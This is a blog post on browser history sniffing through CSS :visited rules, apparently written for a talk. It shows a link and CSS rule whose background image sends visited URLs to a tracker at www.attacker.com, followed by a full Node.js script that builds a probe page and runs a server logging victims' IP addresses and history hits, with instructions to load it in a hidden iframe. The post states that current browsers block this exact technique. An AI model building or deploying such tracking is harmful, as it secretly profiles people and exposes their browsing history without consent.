For a recent talk I took the opportunity to look a little deeper into browser history stealing.

The goal of browser history stealing is to learn which pages a victim has visited. That information is very valuable for profiling a victim, among other uses, but that is a topic for another blog post.

Performing browser history stealing, or browser history sniffing as others call it, via CSS is quite simple. All you need is a web page and a style sheet. Unfortunately there is no way to ask the browser directly which pages it has visited, so we have to find out indirectly: we place links to the pages we would like to know about on a web page under our control (e.g. in an iframe):

<a href="http://www.its-blog.de/?p=27" id="link1">this page</a>

The link gets an id attribute. The id is used to attach the style rules that determine how this particular link is displayed. Note that the href must be the absolute URL exactly as the browser stored it in the history (including the scheme): a relative href such as www.its-blog.de/?p=27 would be resolved against our own page and would never match the visited page.

Let's have a look at the style sheet:

#link1 {
   color: blue;
}

#link1:visited {
   color: red;
   background:
   url(http://www.attacker.com/track.php?url=http%3A%2F%2Fwww.its-blog.de%2F%3Fp%3D27);
}

The trick is the background image. In the :visited rule we ask the browser to display a background image. Since the browser wants to save bandwidth, it loads this image only when it is actually needed, that is, when the link has been visited. Because we encoded the URL we want to check into the image URL, we can write a script track.php that returns a 1×1 white pixel and stores the IP address of the requester together with the url parameter of the request. The parameter should be URL-encoded: a '&' or '?' inside the probed URL would otherwise be parsed as part of the tracker's own query string and the recorded URL would be truncated. The tracker should also answer with Cache-Control: no-store, so that a cached copy of the pixel does not swallow a later probe of the same URL.
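The whole procedure above, probe page plus tracker, as an added Node.js example that is not code from the original post: buildProbePage() emits one link and one pair of CSS rules per candidate URL, and handleBeacon() does what track.php does on the attacker's side. The tracker host www.attacker.com, the /track.php path, the candidate list, the in-memory hit log and the command-line flags are all assumptions made for this example.

```javascript
// Added example, not code from the original post: a Node.js script that builds
// the probe page described above (one link + :visited rule per candidate URL)
// and implements the tracking endpoint that "track.php" stands for.
// Assumptions: the tracker host www.attacker.com, the /track.php path, the
// candidate list and the in-memory hit log are all made up for this example.

const TRACKER = 'http://www.attacker.com/track.php';

// Constructed candidate list. Each entry must be the absolute URL exactly as it
// would appear in the victim's history: :visited matches the resolved URL.
const CANDIDATES = [
  'http://www.its-blog.de/?p=27',
  'http://www.example.com/?a=1&b=2',
];

function escapeHtml(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;')
          .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

// Build the probe page: for candidate i, link #link{i} gets a :visited rule
// whose background image points at the tracker with the candidate URL as a
// percent-encoded query parameter. The browser only requests that image for
// links it considers visited, so every request that reaches the tracker is a hit.
function buildProbePage(candidates, tracker = TRACKER) {
  const css = [];
  const links = [];
  candidates.forEach((url, i) => {
    const id = `link${i + 1}`;
    // encodeURIComponent keeps '?', '=' and '&' inside the probed URL from
    // being parsed as part of the tracker's own query string.
    const beacon = `${tracker}?url=${encodeURIComponent(url)}`;
    css.push(`#${id} { color: blue; }`);
    css.push(`#${id}:visited { color: red; background: url("${beacon}"); }`);
    links.push(`<a href="${escapeHtml(url)}" id="${id}">${escapeHtml(url)}</a>`);
  });
  return ['<!DOCTYPE html>', '<html><head><meta charset="utf-8"><style>',
          ...css, '</style></head><body>', ...links, '</body></html>', ''].join('\n');
}

// 1x1 transparent GIF (43 bytes), constructed inline; it renders as nothing on
// the page, which is what the post's white pixel is for.
const PIXEL_GIF = Buffer.from(
  'R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==', 'base64');

// Turn one tracker request into a hit record, or null if it is not a beacon
// (e.g. a favicon request). URLSearchParams undoes the percent-encoding.
function parseBeacon(requestUrl, remoteAddr) {
  const u = new URL(requestUrl, 'http://localhost');
  if (u.pathname !== '/track.php') return null;
  const url = u.searchParams.get('url');
  if (!url) return null;
  return { ip: remoteAddr, url, at: new Date().toISOString() };
}

// Record a hit (if any) and return the response every request gets: the pixel,
// marked uncacheable so that a cached copy cannot swallow a later probe.
const HITS = [];
function handleBeacon(requestUrl, remoteAddr, log = HITS) {
  const hit = parseBeacon(requestUrl, remoteAddr);
  if (hit) log.push(hit);
  return {
    status: 200,
    headers: { 'Content-Type': 'image/gif', 'Cache-Control': 'no-store',
               'Content-Length': PIXEL_GIF.length },
    body: PIXEL_GIF,
    hit,
  };
}

function startTracker(port, log = HITS) {
  const http = require('node:http');
  return http.createServer((req, res) => {
    const r = handleBeacon(req.url, req.socket.remoteAddress, log);
    if (r.hit) console.log(`visited: ${r.hit.ip} ${r.hit.url}`);
    res.writeHead(r.status, r.headers);
    res.end(r.body);
  }).listen(port);
}

// node history_probe.js --probe > probe.html   (page to serve to the victim)
// node history_probe.js --serve                (tracker on port 8080)
if (process.argv.includes('--serve')) {
  startTracker(8080);
} else if (process.argv.includes('--probe')) {
  process.stdout.write(buildProbePage(CANDIDATES));
}
```

Serve the output of --probe to the victim (for instance in a hidden iframe) while --serve runs; each visited candidate shows up exactly once in the tracker's log. Note what parseBeacon does with an unencoded '&' in a probed URL: the tracker records only the part before it, which is why buildProbePage percent-encodes the parameter.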

As mentioned above, this only works for pages the adversary guesses in advance: the history cannot be enumerated, only probed one candidate URL at a time, although a single page can carry thousands of such links. Note also that browsers have since restricted what a :visited rule may do: Firefox 4 and Chrome 9 onward limit it to colour properties and do not load background images for visited links, so this exact technique no longer works in current browsers.

to be continued ….